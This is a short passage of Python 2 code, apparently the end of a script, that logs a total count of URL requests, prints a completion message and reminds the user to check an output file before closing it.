file.write("\n[-] Total URL Requests "+str(gets))
print "[-] Done\n"
file.write("\n[-] Done\n")
print "Don't forget to check", dbt,"\n"
file.close()
